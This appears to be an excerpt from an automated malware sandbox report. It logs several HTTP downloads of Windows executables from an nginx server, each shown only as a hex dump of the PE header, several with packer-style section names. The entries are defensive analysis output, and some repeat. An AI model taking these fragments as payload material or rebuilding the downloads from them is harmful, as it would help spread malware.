00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:29:26 GMTContent-Type: application/octet-streamContent-Length: 1852928Last-Modified: Thu, 24 Oct 2024 17:07:16 GMTConnection: keep-aliveETag: "671a7ec4-1c4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 55 88 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 66 6e 67 63 63 67 65 00 f0 19 00 00 f0 4f 00 00 e4 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 74 6d 6d 79 65 79 6c 00 10 00 00 00 e0 69 00 00 04 00 00 00 20 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 24 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:29:29 GMTContent-Type: application/octet-streamContent-Length: 2780160Last-Modified: Thu, 24 Oct 2024 16:45:44 GMTConnection: keep-aliveETag: "671a79b8-2a6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 b8 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 6b 71 65 6c 6c 78 00 20 2a 00 00 a0 00 00 00 0c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 76 6e 6b 75 64 67 00 20 00 00 00 c0 2a 00 00 04 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 4a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:07 GMTContent-Type: application/octet-streamContent-Length: 2989568Last-Modified: Thu, 24 Oct 2024 17:07:10 GMTConnection: keep-aliveETag: "671a7ebe-2d9e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 31 00 00 04 00 00 f2 20 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 64 6b 69 73 6e 77 00 10 2b 00 00 00 06 00 00 08 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 64 74 62 72 65 6e 76 00 10 00 00 00 10 31 00 00 04 00 00 00 78 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 31 00 00 22 00 00 00 7c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:07 GMTContent-Type: application/octet-streamContent-Length: 2989568Last-Modified: Thu, 24 Oct 2024 17:07:10 GMTConnection: keep-aliveETag: "671a7ebe-2d9e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 31 00 00 04 00 00 f2 20 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 64 6b 69 73 6e 77 00 10 2b 00 00 00 06 00 00 08 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 64 74 62 72 65 6e 76 00 10 00 00 00 10 31 00 00 04 00 00 00 78 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 31 00 00 22 00 00 00 7c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:07 GMTContent-Type: application/octet-streamContent-Length: 2989568Last-Modified: Thu, 24 Oct 2024 17:07:10 GMTConnection: keep-aliveETag: "671a7ebe-2d9e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 31 00 00 04 00 00 f2 20 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 64 6b 69 73 6e 77 00 10 2b 00 00 00 06 00 00 08 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 64 74 62 72 65 6e 76 00 10 00 00 00 10 31 00 00 04 00 00 00 78 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 31 00 00 22 00 00 00 7c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:13 GMTContent-Type: application/octet-streamContent-Length: 1852928Last-Modified: Thu, 24 Oct 2024 17:07:16 GMTConnection: keep-aliveETag: "671a7ec4-1c4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 55 88 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 66 6e 67 63 63 67 65 00 f0 19 00 00 f0 4f 00 00 e4 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 74 6d 6d 79 65 79 6c 00 10 00 00 00 e0 69 00 00 04 00 00 00 20 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 24 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:19 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 16:45:18 GMTConnection: keep-aliveETag: "671a799e-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 96 79 1a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 55 2d 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
